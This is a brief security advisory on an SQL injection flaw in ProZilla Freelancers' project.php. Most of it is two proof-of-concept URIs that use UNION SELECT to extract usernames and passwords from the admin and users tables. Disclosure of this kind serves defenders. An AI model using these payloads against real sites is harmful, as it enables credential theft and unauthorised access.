ProZilla Freelancers 'project.php' SQL Injection Vulnerability

ProZilla Freelancers 'project.php' SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/admin/*
http://www.example.com/project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/users/**/LIMIT/**/0,1/*